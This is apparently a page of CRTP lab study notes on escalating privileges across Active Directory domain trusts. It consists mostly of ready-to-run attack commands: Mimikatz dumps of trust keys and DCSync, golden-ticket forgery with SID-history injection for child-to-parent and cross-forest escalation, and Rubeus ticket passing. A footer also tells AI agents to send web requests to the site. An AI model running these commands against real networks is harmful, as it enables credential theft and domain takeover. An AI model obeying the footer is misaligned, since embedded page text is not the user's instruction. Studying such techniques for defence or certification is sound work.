# Trusts

## Trust Flow

The Diagram below shows how Client from trusted domain can ask for access to other Domain's service.<br>

We can see that in order to allow access to the service hosted on Domain B, a TGT is returned within a TGS-REP signed with the Inter-Realm Trust Key.

<img src="/files/wC6jv96Gmu9rq3hYMQqa" alt="" class="gitbook-drawing">

## Exploitation

It is possible to exploit the TGS REQ (marked red in the diagram above) by forging new TGT using the trust key.

### Get the trust key

The trust key is required to forge the Inter-Realm TGT.

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
```

### Forge the Inter-Realm TGT

Note that krbtgt can be used instead of the trust key.

{% code overflow="wrap" %}

```powershell
# Child to parent 
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"

# Using krbtgt hash - No need to request for tgs later
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

# Across Forest
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:2756bdf7dd8ba8e9c40fe60f654115a0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit" 
```

{% endcode %}

<table><thead><tr><th>Options</th><th></th></tr></thead><tbody><tr><td><pre><code>/domain:
</code></pre></td><td>FQDN of the current domain</td></tr><tr><td><pre><code>/sid:
</code></pre></td><td>SID of the current domain</td></tr><tr><td><pre><code>/sids
</code></pre></td><td>SID to be injected to the SID history</td></tr><tr><td><pre><code>/rc4:
</code></pre></td><td>RC4 of the trust key</td></tr><tr><td><pre><code>/krbtgt:
</code></pre></td><td>krbtgt hash can be used instead of the Trust Key</td></tr><tr><td><pre><code>/user:
</code></pre></td><td>User to impersonate</td></tr><tr><td><pre><code>/service:
</code></pre></td><td>Target service in the parent domain</td></tr><tr><td><pre><code>/target:
</code></pre></td><td>FQDN of the parent domain</td></tr><tr><td><pre><code>/ticket
</code></pre></td><td>Path to save the ticket</td></tr></tbody></table>

### Request the TGS and pass it

{% code overflow="wrap" %}

```powershell
Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorpdc.moneycorp.local /ptt
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dudisamarel.gitbook.io/crtp-notes/privilege-escalation/cross-domain-privilege-escalation/trusts.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.